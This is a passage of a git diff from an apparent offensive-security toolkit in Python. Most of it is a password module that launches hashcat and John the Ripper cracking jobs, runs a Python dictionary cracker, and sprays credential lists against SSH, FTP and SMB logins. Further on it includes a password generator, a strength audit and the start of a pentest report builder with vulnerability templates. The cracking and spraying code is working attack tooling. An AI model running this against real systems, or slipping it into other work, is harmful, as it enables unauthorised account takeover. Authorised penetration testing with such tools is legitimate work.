        if not tool:
            # Fallback: Python-based dictionary attack (slow but works).
            return self._python_crack(hash_str, hash_type, wordlist)
        # Default wordlist when the caller did not supply one.
        if not wordlist:
            wordlist = self._find_default_wordlist()
        job_id = f'crack_{int(time.time())}_{secrets.token_hex(4)}'
        if tool == 'hashcat':
            return self._crack_hashcat(job_id, hash_str, hash_type,
                                       wordlist, attack_mode, rules, mask)
        else:
            return self._crack_john(job_id, hash_str, hash_type,
                                    wordlist, attack_mode, rules, mask)

    def _crack_hashcat(self, job_id: str, hash_str: str, hash_type: str,
                       wordlist: str, attack_mode: str, rules: str,
                       mask: str) -> dict:
        """Launch hashcat in a background daemon thread (1 hour timeout)."""
        hashcat = find_tool('hashcat')
        # Map our hash-type name to hashcat's -m mode number.
        mode = 0
        for sig in HASH_SIGNATURES:
            if sig.name == hash_type:
                mode = sig.hashcat_mode
                break
        # hashcat reads hashes from a file; cracked results land in out_file.
        hash_file = os.path.join(self._results_dir, f'{job_id}.hash')
        out_file = os.path.join(self._results_dir, f'{job_id}.pot')
        with open(hash_file, 'w') as f:
            f.write(hash_str + '\n')
        cmd = [hashcat, '-m', str(mode), hash_file, '-o', out_file, '--potfile-disable']
        attack_modes = {'dictionary': '0', 'brute_force': '3', 'mask': '3', 'hybrid': '6'}
        cmd.extend(['-a', attack_modes.get(attack_mode, '0')])
        if attack_mode in ('dictionary', 'hybrid') and wordlist:
            cmd.append(wordlist)
        # Hybrid mode (-a 6) takes the wordlist FIRST and then the mask,
        # so the mask must be appended for 'hybrid' as well.
        if attack_mode in ('brute_force', 'mask', 'hybrid') and mask:
            cmd.append(mask)
        elif attack_mode == 'brute_force' and not mask:
            cmd.append('?a?a?a?a?a?a?a?a')  # Default 8-char brute force
        if rules:
            cmd.extend(['-r', rules])
        result_holder = {'result': None, 'done': False}
        self._active_jobs[job_id] = result_holder
        def run_crack():
            try:
                proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
                cracked = ''
                if os.path.exists(out_file):
                    with open(out_file, 'r') as f:
                        cracked = f.read().strip()
                result_holder['result'] = {
                    'ok': True,
                    'cracked': cracked,
                    'output': proc.stdout[-2000:] if proc.stdout else '',
                    'returncode': proc.returncode,
                }
            except subprocess.TimeoutExpired:
                result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'}
            except Exception as e:
                result_holder['result'] = {'ok': False, 'error': str(e)}
            finally:
                result_holder['done'] = True
        threading.Thread(target=run_crack, daemon=True).start()
        return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with hashcat (mode {mode})'}

    def _crack_john(self, job_id: str, hash_str: str, hash_type: str,
                    wordlist: str, attack_mode: str, rules: str,
                    mask: str) -> dict:
        """Launch John the Ripper in a background daemon thread."""
        john = find_tool('john')
        # Map our hash-type name to john's --format string ('' = autodetect).
        fmt = ''
        for sig in HASH_SIGNATURES:
            if sig.name == hash_type:
                fmt = sig.john_format
                break
        hash_file = os.path.join(self._results_dir, f'{job_id}.hash')
        with open(hash_file, 'w') as f:
            f.write(hash_str + '\n')
        cmd = [john, hash_file]
        if fmt:
            cmd.extend(['--format=' + fmt])
        if wordlist and attack_mode == 'dictionary':
            cmd.extend(['--wordlist=' + wordlist])
        if rules:
            cmd.extend(['--rules=' + rules])
        if attack_mode in ('mask', 'brute_force') and mask:
            cmd.extend(['--mask=' + mask])
        result_holder = {'result': None, 'done': False}
        self._active_jobs[job_id] = result_holder
        def run_crack():
            try:
                proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
                # john prints cracked credentials via a separate --show run.
                show = subprocess.run([john, '--show', hash_file],
                                      capture_output=True, text=True, timeout=10)
                result_holder['result'] = {
                    'ok': True,
                    'cracked': show.stdout.strip() if show.stdout else '',
                    'output': proc.stdout[-2000:] if proc.stdout else '',
                    'returncode': proc.returncode,
                }
            except subprocess.TimeoutExpired:
                result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'}
            except Exception as e:
                result_holder['result'] = {'ok': False, 'error': str(e)}
            finally:
                result_holder['done'] = True
        threading.Thread(target=run_crack, daemon=True).start()
        return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with john ({fmt or "auto"})'}

    def _python_crack(self, hash_str: str, hash_type: str,
                      wordlist: str) -> dict:
        """Fallback pure-Python dictionary crack for common hash types.

        Runs synchronously (no job_id) and gives up after 10M candidates.
        """
        algo_map = {
            'MD5': 'md5', 'SHA-1': 'sha1', 'SHA-256': 'sha256',
            'SHA-512': 'sha512', 'SHA-224': 'sha224', 'SHA-384': 'sha384',
        }
        algo = algo_map.get(hash_type)
        if not algo:
            return {'ok': False, 'error': f'Python cracker does not support {hash_type}. Install hashcat or john.'}
        if not wordlist:
            wordlist = self._find_default_wordlist()
        if not wordlist or not os.path.exists(wordlist):
            return {'ok': False, 'error': 'No wordlist available'}
        hash_lower = hash_str.lower()
        tried = 0
        try:
            with open(wordlist, 'r', encoding='utf-8', errors='ignore') as f:
                for line in f:
                    word = line.strip()
                    if not word:
                        continue
                    h = hashlib.new(algo, word.encode('utf-8')).hexdigest()
                    tried += 1
                    if h == hash_lower:
                        return {
                            'ok': True,
                            'cracked': f'{hash_str}:{word}',
                            'plaintext': word,
                            'tried': tried,
                            'message': f'Cracked! Password: {word}',
                        }
                    if tried >= 10_000_000:
                        break  # Hard cap so a huge wordlist cannot hang us
        except Exception as e:
            return {'ok': False, 'error': str(e)}
        return {'ok': True, 'cracked': '', 'tried': tried,
                'message': f'Not cracked. Tried {tried:,} candidates.'}

    def get_crack_status(self, job_id: str) -> dict:
        """Check status of a cracking job.

        Once the finished result is returned the job entry is removed, so
        a second query for the same id reports 'Job not found'.
        """
        holder = self._active_jobs.get(job_id)
        if not holder:
            return {'ok': False, 'error': 'Job not found'}
        if not holder['done']:
            return {'ok': True, 'done': False, 'message': 'Cracking in progress...'}
        self._active_jobs.pop(job_id, None)
        return {'ok': True, 'done': True, **holder['result']}

    # ── Password Generation ───────────────────────────────────────────────
    def generate_password(self, length: int = 16, count: int = 1,
                          uppercase: bool = True, lowercase: bool = True,
                          digits: bool = True, symbols: bool = True,
                          exclude_chars: str = '',
                          pattern: str = '') -> List[str]:
        """Generate secure random passwords.

        When *pattern* is given it takes precedence and the charset flags
        are ignored (see :meth:`_generate_from_pattern` for the syntax).
        *count* is clamped to 1..100 and *length* to 4..128.
        """
        # Clamp count up front so the pattern branch cannot be driven to
        # produce an unbounded number of passwords.
        count = max(1, min(count, 100))
        if pattern:
            return [self._generate_from_pattern(pattern) for _ in range(count)]
        charset = ''
        if uppercase:
            charset += string.ascii_uppercase
        if lowercase:
            charset += string.ascii_lowercase
        if digits:
            charset += string.digits
        if symbols:
            charset += '!@#$%^&*()-_=+[]{}|;:,.<>?'
        if exclude_chars:
            charset = ''.join(c for c in charset if c not in exclude_chars)
        if not charset:
            # All classes disabled (or everything excluded): fall back to
            # alphanumerics rather than failing.
            charset = string.ascii_letters + string.digits
        length = max(4, min(length, 128))
        passwords = []
        for _ in range(count):
            pw = ''.join(secrets.choice(charset) for _ in range(length))
            passwords.append(pw)
        return passwords

    def _generate_from_pattern(self, pattern: str) -> str:
        """Generate password from pattern.

        ?u = uppercase, ?l = lowercase, ?d = digit, ?s = symbol, ?a = any;
        any other character (including unknown ?x pairs) is kept literally.
        """
        result = []
        i = 0
        while i < len(pattern):
            if pattern[i] == '?' and i + 1 < len(pattern):
                c = pattern[i + 1]
                if c == 'u':
                    result.append(secrets.choice(string.ascii_uppercase))
                elif c == 'l':
                    result.append(secrets.choice(string.ascii_lowercase))
                elif c == 'd':
                    result.append(secrets.choice(string.digits))
                elif c == 's':
                    result.append(secrets.choice('!@#$%^&*()-_=+'))
                elif c == 'a':
                    result.append(secrets.choice(
                        string.ascii_letters + string.digits + '!@#$%^&*'))
                else:
                    result.append(pattern[i:i+2])  # Unknown escape: literal
                i += 2
            else:
                result.append(pattern[i])
                i += 1
        return ''.join(result)

    # ── Password Policy Audit ─────────────────────────────────────────────
    def audit_password(self, password: str) -> dict:
        """Audit a password against common policies and calculate entropy.

        Entropy is the idealized len(password) * log2(charset_size); the
        strength label combines entropy thresholds with policy checks.
        """
        import math
        checks = {
            'length_8': len(password) >= 8,
            'length_12': len(password) >= 12,
            'length_16': len(password) >= 16,
            'has_uppercase': bool(re.search(r'[A-Z]', password)),
            'has_lowercase': bool(re.search(r'[a-z]', password)),
            'has_digit': bool(re.search(r'[0-9]', password)),
            'has_symbol': bool(re.search(r'[^A-Za-z0-9]', password)),
            'no_common_patterns': not self._has_common_patterns(password),
            'no_sequential': not self._has_sequential(password),
            'no_repeated': not self._has_repeated(password),
        }
        # Estimate the effective alphabet from which characters were drawn.
        charset_size = 0
        if re.search(r'[a-z]', password):
            charset_size += 26
        if re.search(r'[A-Z]', password):
            charset_size += 26
        if re.search(r'[0-9]', password):
            charset_size += 10
        if re.search(r'[^A-Za-z0-9]', password):
            charset_size += 32
        entropy = len(password) * math.log2(charset_size) if charset_size > 0 else 0
        # Strength rating buckets.
        if entropy >= 80 and all(checks.values()):
            strength = 'very_strong'
        elif entropy >= 60 and checks['length_12']:
            strength = 'strong'
        elif entropy >= 40 and checks['length_8']:
            strength = 'medium'
        elif entropy >= 28:
            strength = 'weak'
        else:
            strength = 'very_weak'
        return {
            'length': len(password),
            'entropy': round(entropy, 1),
            'strength': strength,
            'checks': checks,
            'charset_size': charset_size,
        }

    def _has_common_patterns(self, pw: str) -> bool:
        """True if the password contains a well-known weak substring."""
        common = ['password', '123456', 'qwerty', 'abc123', 'letmein',
                  'admin', 'welcome', 'monkey', 'dragon', 'master',
                  'login', 'princess', 'football', 'shadow', 'sunshine',
                  'trustno1', 'iloveyou', 'batman', 'access', 'hello']
        pl = pw.lower()
        return any(c in pl for c in common)

    def _has_sequential(self, pw: str) -> bool:
        """True if the password contains 3 consecutively ascending chars."""
        for i in range(len(pw) - 2):
            if (ord(pw[i]) + 1 == ord(pw[i+1]) == ord(pw[i+2]) - 1):
                return True
        return False

    def _has_repeated(self, pw: str) -> bool:
        """True if the password contains the same character 3x in a row."""
        for i in range(len(pw) - 2):
            if pw[i] == pw[i+1] == pw[i+2]:
                return True
        return False

    # ── Credential Spray / Stuff ──────────────────────────────────────────
    def credential_spray(self, targets: List[dict], passwords: List[str],
                         protocol: str = 'ssh', threads: int = 4,
                         delay: float = 1.0) -> dict:
        """Spray passwords against target services in a background thread.

        targets: [{'host': '...', 'port': 22, 'username': 'admin'}, ...]
        protocol: 'ssh', 'ftp', 'smb', 'http_basic', 'http_form'

        NOTE: ``threads`` is accepted for interface compatibility but the
        spray currently runs sequentially, sleeping ``delay`` seconds
        between attempts.
        """
        if not targets or not passwords:
            return {'ok': False, 'error': 'Targets and passwords required'}
        job_id = f'spray_{int(time.time())}_{secrets.token_hex(4)}'
        result_holder = {
            'done': False,
            'results': [],
            'total': len(targets) * len(passwords),
            'tested': 0,
            'found': [],
        }
        self._active_jobs[job_id] = result_holder
        def do_spray():
            for target in targets:
                host = target.get('host', '')
                port = target.get('port', 0)
                username = target.get('username', '')
                for pw in passwords:
                    if protocol == 'ssh':
                        ok = self._test_ssh(host, port or 22, username, pw)
                    elif protocol == 'ftp':
                        ok = self._test_ftp(host, port or 21, username, pw)
                    elif protocol == 'smb':
                        ok = self._test_smb(host, port or 445, username, pw)
                    else:
                        # Unsupported protocols are counted but never succeed.
                        ok = False
                    result_holder['tested'] += 1
                    if ok:
                        cred = {'host': host, 'port': port, 'username': username,
                                'password': pw, 'protocol': protocol}
                        result_holder['found'].append(cred)
                    time.sleep(delay)
            result_holder['done'] = True
        threading.Thread(target=do_spray, daemon=True).start()
        return {'ok': True, 'job_id': job_id,
                'message': f'Spray started: {len(targets)} targets × {len(passwords)} passwords'}

    def _test_ssh(self, host: str, port: int, user: str, pw: str) -> bool:
        """Attempt one SSH password login (requires paramiko); False on any error."""
        try:
            import paramiko
            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            client.connect(host, port=port, username=user, password=pw,
                           timeout=5, look_for_keys=False, allow_agent=False)
            client.close()
            return True
        except Exception:
            return False

    def _test_ftp(self, host: str, port: int, user: str, pw: str) -> bool:
        """Attempt one FTP login; False on any error."""
        try:
            import ftplib
            ftp = ftplib.FTP()
            ftp.connect(host, port, timeout=5)
            ftp.login(user, pw)
            ftp.quit()
            return True
        except Exception:
            return False

    def _test_smb(self, host: str, port: int, user: str, pw: str) -> bool:
        """Attempt one SMB login (requires impacket); False on any error."""
        try:
            from impacket.smbconnection import SMBConnection
            conn = SMBConnection(host, host, sess_port=port)
            conn.login(user, pw)
            conn.close()
            return True
        except Exception:
            return False

    def get_spray_status(self, job_id: str) -> dict:
        """Return progress/results for a spray job (entry is kept alive)."""
        holder = self._active_jobs.get(job_id)
        if not holder:
            return {'ok': False, 'error': 'Job not found'}
        return {
            'ok': True,
            'done': holder['done'],
            'tested': holder['tested'],
            'total': holder['total'],
            'found': holder['found'],
        }

    # ── Wordlist Management ───────────────────────────────────────────────
    def list_wordlists(self) -> List[dict]:
        """List available wordlists (managed dir plus common system paths).

        Line counting stops at 10M lines to keep huge lists cheap; system
        lists report lines = -1 (not counted).
        """
        results = []
        for f in Path(self._wordlists_dir).glob('*'):
            if f.is_file():
                size = f.stat().st_size
                line_count = 0
                try:
                    with open(f, 'r', encoding='utf-8', errors='ignore') as fh:
                        for _ in fh:
                            line_count += 1
                            if line_count > 10_000_000:
                                break
                except Exception:
                    pass
                results.append({
                    'name': f.name,
                    'path': str(f),
                    'size': size,
                    'size_human': self._human_size(size),
                    'lines': line_count,
                })
        # Also check common system locations.
        system_lists = [
            '/usr/share/wordlists/rockyou.txt',
            '/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt',
            '/usr/share/wordlists/fasttrack.txt',
        ]
        for path in system_lists:
            if os.path.exists(path) and not any(r['path'] == path for r in results):
                size = os.path.getsize(path)
                results.append({
                    'name': os.path.basename(path),
                    'path': path,
                    'size': size,
                    'size_human': self._human_size(size),
                    'lines': -1,  # Don't count for system lists
                    'system': True,
                })
        return results

    def _find_default_wordlist(self) -> str:
        """Find the best available wordlist, or '' when none exists."""
        # Check our wordlists dir first.
        for f in Path(self._wordlists_dir).glob('*'):
            if f.is_file() and f.stat().st_size > 100:
                return str(f)
        # Well-known system locations (Kali-style layouts).
        candidates = [
            '/usr/share/wordlists/rockyou.txt',
            '/usr/share/wordlists/fasttrack.txt',
            '/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt',
        ]
        for c in candidates:
            if os.path.exists(c):
                return c
        return ''

    def upload_wordlist(self, filename: str, data: bytes) -> dict:
        """Save an uploaded wordlist under a sanitized file name."""
        # Strip anything that could escape the wordlists directory.
        safe_name = re.sub(r'[^a-zA-Z0-9._-]', '_', filename)
        path = os.path.join(self._wordlists_dir, safe_name)
        with open(path, 'wb') as f:
            f.write(data)
        return {'ok': True, 'path': path, 'name': safe_name}

    def delete_wordlist(self, name: str) -> dict:
        """Delete a managed wordlist by name.

        The name is reduced to its basename so a crafted value such as
        '../../etc/passwd' cannot delete files outside the wordlists dir.
        """
        safe_name = os.path.basename(name)
        path = os.path.join(self._wordlists_dir, safe_name)
        if os.path.exists(path):
            os.remove(path)
            return {'ok': True}
        return {'ok': False, 'error': 'Wordlist not found'}

    # ── Hash Generation (for testing) ─────────────────────────────────────
    def hash_string(self, plaintext: str, algorithm: str = 'md5') -> dict:
        """Hash a string with a given algorithm (md5/sha1/sha224/.../sha512)."""
        algo_map = {
            'md5': hashlib.md5,
            'sha1': hashlib.sha1,
            'sha224': hashlib.sha224,
            'sha256': hashlib.sha256,
            'sha384': hashlib.sha384,
            'sha512': hashlib.sha512,
        }
        fn = algo_map.get(algorithm.lower())
        if not fn:
            return {'ok': False, 'error': f'Unsupported algorithm: {algorithm}'}
        h = fn(plaintext.encode('utf-8')).hexdigest()
        return {'ok': True, 'hash': h, 'algorithm': algorithm, 'plaintext': plaintext}

    # ── Tool Detection ────────────────────────────────────────────────────
    def get_tools_status(self) -> dict:
        """Check which external cracking/spraying tools are on PATH."""
        return {
            'hashcat': bool(find_tool('hashcat')),
            'john': bool(find_tool('john')),
            'hydra': bool(find_tool('hydra')),
            'ncrack': bool(find_tool('ncrack')),
        }

    @staticmethod
    def _human_size(size: int) -> str:
        """Format a byte count as a human-readable string (B..TB)."""
        for unit in ('B', 'KB', 'MB', 'GB'):
            if size < 1024:
                return f'{size:.1f} {unit}'
            size /= 1024
        return f'{size:.1f} TB'
# ── Singleton ─────────────────────────────────────────────────────────────────
# Lazily-created process-wide toolkit instance, guarded for thread safety.
_instance = None
_lock = threading.Lock()
def get_password_toolkit() -> PasswordToolkit:
    """Return the shared PasswordToolkit, creating it on first use."""
    global _instance
    if _instance is not None:
        return _instance
    with _lock:
        # Re-check under the lock: another thread may have created the
        # instance between our unlocked check and acquiring the lock.
        if _instance is None:
            _instance = PasswordToolkit()
    return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
    """Interactive CLI for the Password Toolkit.

    Loops over a numbered menu until the user selects 0; all real work is
    delegated to the shared PasswordToolkit service.
    """
    svc = get_password_toolkit()
    while True:
        print("\n╔═══════════════════════════════════════╗")
        print("║         PASSWORD TOOLKIT              ║")
        print("╠═══════════════════════════════════════╣")
        print("║  1 — Identify Hash                    ║")
        print("║  2 — Crack Hash                       ║")
        print("║  3 — Generate Passwords               ║")
        print("║  4 — Audit Password Strength          ║")
        print("║  5 — Hash a String                    ║")
        print("║  6 — Wordlist Management              ║")
        print("║  7 — Tool Status                      ║")
        print("║  0 — Back                             ║")
        print("╚═══════════════════════════════════════╝")
        choice = input("\n  Select: ").strip()
        if choice == '0':
            break
        elif choice == '1':
            h = input("  Hash: ").strip()
            if not h:
                continue
            results = svc.identify_hash(h)
            if results:
                print(f"\n  Possible types ({len(results)}):")
                for r in results:
                    print(f"    [{r['confidence'].upper():6s}] {r['name']}"
                          f"  (hashcat: {r['hashcat_mode']}, john: {r['john_format']})")
            else:
                print("  No matching hash types found.")
        elif choice == '2':
            h = input("  Hash: ").strip()
            wl = input("  Wordlist (empty=default): ").strip()
            result = svc.crack_hash(h, wordlist=wl)
            if result.get('job_id'):
                # Background job: poll every 2 seconds until the worker
                # thread marks it done.
                print(f"  {result['message']}")
                print("  Waiting...")
                while True:
                    time.sleep(2)
                    s = svc.get_crack_status(result['job_id'])
                    if s.get('done'):
                        if s.get('cracked'):
                            print(f"\n  CRACKED: {s['cracked']}")
                        else:
                            print(f"\n  Not cracked. {s.get('message', '')}")
                        break
            elif result.get('cracked'):
                # Synchronous (pure-Python fallback) crack succeeded.
                print(f"\n  CRACKED: {result['cracked']}")
            else:
                print(f"  {result.get('message', result.get('error', ''))}")
        elif choice == '3':
            # Guard against non-numeric input instead of crashing the CLI
            # with an unhandled ValueError.
            try:
                length = int(input("  Length (default 16): ").strip() or '16')
                count = int(input("  Count (default 5): ").strip() or '5')
            except ValueError:
                print("  Invalid number.")
                continue
            passwords = svc.generate_password(length=length, count=count)
            print("\n  Generated passwords:")
            for pw in passwords:
                audit = svc.audit_password(pw)
                print(f"    {pw}  [{audit['strength']}]  {audit['entropy']} bits")
        elif choice == '4':
            pw = input("  Password: ").strip()
            if not pw:
                continue
            audit = svc.audit_password(pw)
            print(f"\n  Strength: {audit['strength']}")
            print(f"  Entropy:  {audit['entropy']} bits")
            print(f"  Length:   {audit['length']}")
            print(f"  Charset:  {audit['charset_size']} characters")
            for check, passed in audit['checks'].items():
                mark = '\033[92m✓\033[0m' if passed else '\033[91m✗\033[0m'
                print(f"    {mark} {check}")
        elif choice == '5':
            text = input("  Plaintext: ").strip()
            algo = input("  Algorithm (md5/sha1/sha256/sha512): ").strip() or 'sha256'
            r = svc.hash_string(text, algo)
            if r['ok']:
                print(f"  {r['algorithm']}: {r['hash']}")
            else:
                print(f"  Error: {r['error']}")
        elif choice == '6':
            wls = svc.list_wordlists()
            if wls:
                print(f"\n  Wordlists ({len(wls)}):")
                for w in wls:
                    sys_tag = ' [system]' if w.get('system') else ''
                    print(f"    {w['name']}  — {w['size_human']}{sys_tag}")
            else:
                print("  No wordlists found.")
        elif choice == '7':
            tools = svc.get_tools_status()
            print("\n  Tool Status:")
            for tool, available in tools.items():
                mark = '\033[92m✓\033[0m' if available else '\033[91m✗\033[0m'
                print(f"    {mark} {tool}")

1489
modules/phishmail.py Normal file

File diff suppressed because it is too large Load Diff

1669
modules/pineapple.py Normal file

File diff suppressed because it is too large Load Diff

2043
modules/rcs_tools.py Normal file

File diff suppressed because it is too large Load Diff

2191
modules/recon.py Normal file

File diff suppressed because it is too large Load Diff

499
modules/report_engine.py Normal file
View File

@@ -0,0 +1,499 @@
"""AUTARCH Reporting Engine
Structured pentest report builder with findings, CVSS scoring, evidence,
and export to HTML/Markdown/JSON.
"""
DESCRIPTION = "Pentest report builder & exporter"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import json
import time
import uuid
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
from dataclasses import dataclass, field, asdict
import threading
# Prefer the project's data-dir helper; fall back to a local default so the
# module stays importable when used outside the AUTARCH package.
try:
    from core.paths import get_data_dir
except ImportError:
    def get_data_dir():
        """Return a 'data' directory beside the package root (fallback)."""
        return str(Path(__file__).parent.parent / 'data')
# ── Finding Severity & CVSS ──────────────────────────────────────────────────
# Per-severity presentation metadata: report accent color, the CVSS v3
# score band each label corresponds to, and a sort key (0 = most severe).
SEVERITY_MAP = {
    'critical': {'color': '#dc2626', 'score_range': '9.0-10.0', 'order': 0},
    'high': {'color': '#ef4444', 'score_range': '7.0-8.9', 'order': 1},
    'medium': {'color': '#f59e0b', 'score_range': '4.0-6.9', 'order': 2},
    'low': {'color': '#22c55e', 'score_range': '0.1-3.9', 'order': 3},
    'info': {'color': '#6366f1', 'score_range': '0.0', 'order': 4},
}
# Boilerplate findings offered to the user as starting points.  Each entry
# mirrors the shape of a report finding (title/severity/cvss/description/
# impact/remediation/references); 'id' here is the template key, not the
# per-report finding id (which add_finding assigns).
FINDING_TEMPLATES = [
    {
        'id': 'sqli',
        'title': 'SQL Injection',
        'severity': 'critical',
        'cvss': 9.8,
        'description': 'The application is vulnerable to SQL injection, allowing an attacker to manipulate database queries.',
        'impact': 'Complete database compromise, data exfiltration, authentication bypass, potential remote code execution.',
        'remediation': 'Use parameterized queries/prepared statements. Implement input validation and WAF rules.',
        'references': ['OWASP Top 10: A03:2021', 'CWE-89'],
    },
    {
        'id': 'xss',
        'title': 'Cross-Site Scripting (XSS)',
        'severity': 'high',
        'cvss': 7.5,
        'description': 'The application reflects user input without proper sanitization, enabling script injection.',
        'impact': 'Session hijacking, credential theft, defacement, malware distribution.',
        'remediation': 'Encode all output, implement Content-Security-Policy, use framework auto-escaping.',
        'references': ['OWASP Top 10: A03:2021', 'CWE-79'],
    },
    {
        'id': 'broken_auth',
        'title': 'Broken Authentication',
        'severity': 'critical',
        'cvss': 9.1,
        'description': 'Authentication mechanisms can be bypassed or abused to gain unauthorized access.',
        'impact': 'Account takeover, privilege escalation, unauthorized data access.',
        'remediation': 'Implement MFA, rate limiting, secure session management, strong password policies.',
        'references': ['OWASP Top 10: A07:2021', 'CWE-287'],
    },
    {
        'id': 'idor',
        'title': 'Insecure Direct Object Reference (IDOR)',
        'severity': 'high',
        'cvss': 7.5,
        'description': 'The application exposes internal object references that can be manipulated to access unauthorized resources.',
        'impact': 'Unauthorized access to other users\' data, horizontal privilege escalation.',
        'remediation': 'Implement proper access control checks, use indirect references.',
        'references': ['OWASP Top 10: A01:2021', 'CWE-639'],
    },
    {
        'id': 'missing_headers',
        'title': 'Missing Security Headers',
        'severity': 'low',
        'cvss': 3.1,
        'description': 'The application does not implement recommended security headers.',
        'impact': 'Increased attack surface for clickjacking, MIME sniffing, and XSS attacks.',
        'remediation': 'Implement CSP, X-Frame-Options, X-Content-Type-Options, HSTS headers.',
        'references': ['OWASP Secure Headers Project'],
    },
    {
        'id': 'weak_ssl',
        'title': 'Weak SSL/TLS Configuration',
        'severity': 'medium',
        'cvss': 5.3,
        'description': 'The server supports weak SSL/TLS protocols or cipher suites.',
        'impact': 'Potential for traffic interception via downgrade attacks.',
        'remediation': 'Disable TLS 1.0/1.1, remove weak ciphers, enable HSTS.',
        'references': ['CWE-326', 'NIST SP 800-52'],
    },
    {
        'id': 'info_disclosure',
        'title': 'Information Disclosure',
        'severity': 'medium',
        'cvss': 5.0,
        'description': 'The application reveals sensitive information such as server versions, stack traces, or internal paths.',
        'impact': 'Aids attackers in fingerprinting and planning targeted attacks.',
        'remediation': 'Remove version headers, disable debug modes, implement custom error pages.',
        'references': ['CWE-200'],
    },
    {
        'id': 'default_creds',
        'title': 'Default Credentials',
        'severity': 'critical',
        'cvss': 9.8,
        'description': 'The system uses default or well-known credentials that have not been changed.',
        'impact': 'Complete system compromise with minimal effort.',
        'remediation': 'Enforce password change on first login, remove default accounts.',
        'references': ['CWE-798'],
    },
    {
        'id': 'eternalblue',
        'title': 'MS17-010 (EternalBlue)',
        'severity': 'critical',
        'cvss': 9.8,
        'description': 'The target is vulnerable to the EternalBlue SMB exploit (MS17-010).',
        'impact': 'Remote code execution with SYSTEM privileges, wormable exploit.',
        'remediation': 'Apply Microsoft patch MS17-010, disable SMBv1.',
        'references': ['CVE-2017-0144', 'MS17-010'],
    },
    {
        'id': 'open_ports',
        'title': 'Unnecessary Open Ports',
        'severity': 'low',
        'cvss': 3.0,
        'description': 'The target exposes network services that are not required for operation.',
        'impact': 'Increased attack surface, potential exploitation of exposed services.',
        'remediation': 'Close unnecessary ports, implement firewall rules, use network segmentation.',
        'references': ['CIS Benchmarks'],
    },
]
# ── Report Engine ─────────────────────────────────────────────────────────────
class ReportEngine:
"""Pentest report builder with findings management and export."""
    def __init__(self):
        # Each report is persisted as its own JSON file in this directory.
        self._data_dir = os.path.join(get_data_dir(), 'reports')
        os.makedirs(self._data_dir, exist_ok=True)
# ── Report CRUD ───────────────────────────────────────────────────────
    def create_report(self, title: str, client: str = '',
                      scope: str = '', methodology: str = '') -> dict:
        """Create and persist a new draft report.

        Returns {'ok': True, 'report': <full report dict>}.
        """
        # Short random id: first 8 chars of a UUID4 keep filenames compact.
        report_id = str(uuid.uuid4())[:8]
        report = {
            'id': report_id,
            'title': title,
            'client': client,
            'scope': scope,
            'methodology': methodology or 'OWASP Testing Guide v4.2 / PTES',
            'executive_summary': '',
            'findings': [],
            'created_at': datetime.now(timezone.utc).isoformat(),
            'updated_at': datetime.now(timezone.utc).isoformat(),
            'status': 'draft',
            'author': 'AUTARCH',
        }
        self._save_report(report)
        return {'ok': True, 'report': report}
def get_report(self, report_id: str) -> Optional[dict]:
path = os.path.join(self._data_dir, f'{report_id}.json')
if not os.path.exists(path):
return None
with open(path, 'r') as f:
return json.load(f)
    def update_report(self, report_id: str, updates: dict) -> dict:
        """Apply field updates to an existing report and persist it.

        Only keys already present on the report are applied; 'id' and
        'created_at' are immutable.  Unknown keys are silently ignored.
        """
        report = self.get_report(report_id)
        if not report:
            return {'ok': False, 'error': 'Report not found'}
        for k, v in updates.items():
            if k in report and k not in ('id', 'created_at'):
                report[k] = v
        report['updated_at'] = datetime.now(timezone.utc).isoformat()
        self._save_report(report)
        return {'ok': True, 'report': report}
def delete_report(self, report_id: str) -> dict:
path = os.path.join(self._data_dir, f'{report_id}.json')
if os.path.exists(path):
os.remove(path)
return {'ok': True}
return {'ok': False, 'error': 'Report not found'}
    def list_reports(self) -> List[dict]:
        """Return summaries of all stored reports, most recently updated first.

        Unreadable or malformed report files are skipped silently.
        """
        reports = []
        for f in Path(self._data_dir).glob('*.json'):
            try:
                with open(f, 'r') as fh:
                    r = json.load(fh)
                reports.append({
                    'id': r['id'],
                    'title': r['title'],
                    'client': r.get('client', ''),
                    'status': r.get('status', 'draft'),
                    'findings_count': len(r.get('findings', [])),
                    'created_at': r.get('created_at', ''),
                    'updated_at': r.get('updated_at', ''),
                })
            except Exception:
                continue
        # ISO-8601 timestamps sort correctly as plain strings.
        reports.sort(key=lambda r: r.get('updated_at', ''), reverse=True)
        return reports
# ── Finding Management ────────────────────────────────────────────────
    def add_finding(self, report_id: str, finding: dict) -> dict:
        """Append a finding to a report, assigning an id and defaults.

        NOTE: mutates the caller-supplied dict in place.
        """
        report = self.get_report(report_id)
        if not report:
            return {'ok': False, 'error': 'Report not found'}
        # Give the finding its own short id plus sane defaults for any
        # fields the caller omitted.
        finding['id'] = str(uuid.uuid4())[:8]
        finding.setdefault('severity', 'medium')
        finding.setdefault('cvss', 5.0)
        finding.setdefault('status', 'open')
        finding.setdefault('evidence', [])
        report['findings'].append(finding)
        report['updated_at'] = datetime.now(timezone.utc).isoformat()
        self._save_report(report)
        return {'ok': True, 'finding': finding}
def update_finding(self, report_id: str, finding_id: str,
                   updates: dict) -> dict:
    """Update fields of a single finding inside a report ('id' is immutable)."""
    report = self.get_report(report_id)
    if not report:
        return {'ok': False, 'error': 'Report not found'}
    for finding in report['findings']:
        if finding['id'] != finding_id:
            continue
        for key, value in updates.items():
            if key != 'id':
                finding[key] = value
        report['updated_at'] = datetime.now(timezone.utc).isoformat()
        self._save_report(report)
        return {'ok': True, 'finding': finding}
    return {'ok': False, 'error': 'Finding not found'}
def delete_finding(self, report_id: str, finding_id: str) -> dict:
    """Remove the finding with the given id from a report and persist."""
    report = self.get_report(report_id)
    if not report:
        return {'ok': False, 'error': 'Report not found'}
    kept = [f for f in report['findings'] if f['id'] != finding_id]
    report['findings'] = kept
    report['updated_at'] = datetime.now(timezone.utc).isoformat()
    self._save_report(report)
    return {'ok': True}
def get_finding_templates(self) -> List[dict]:
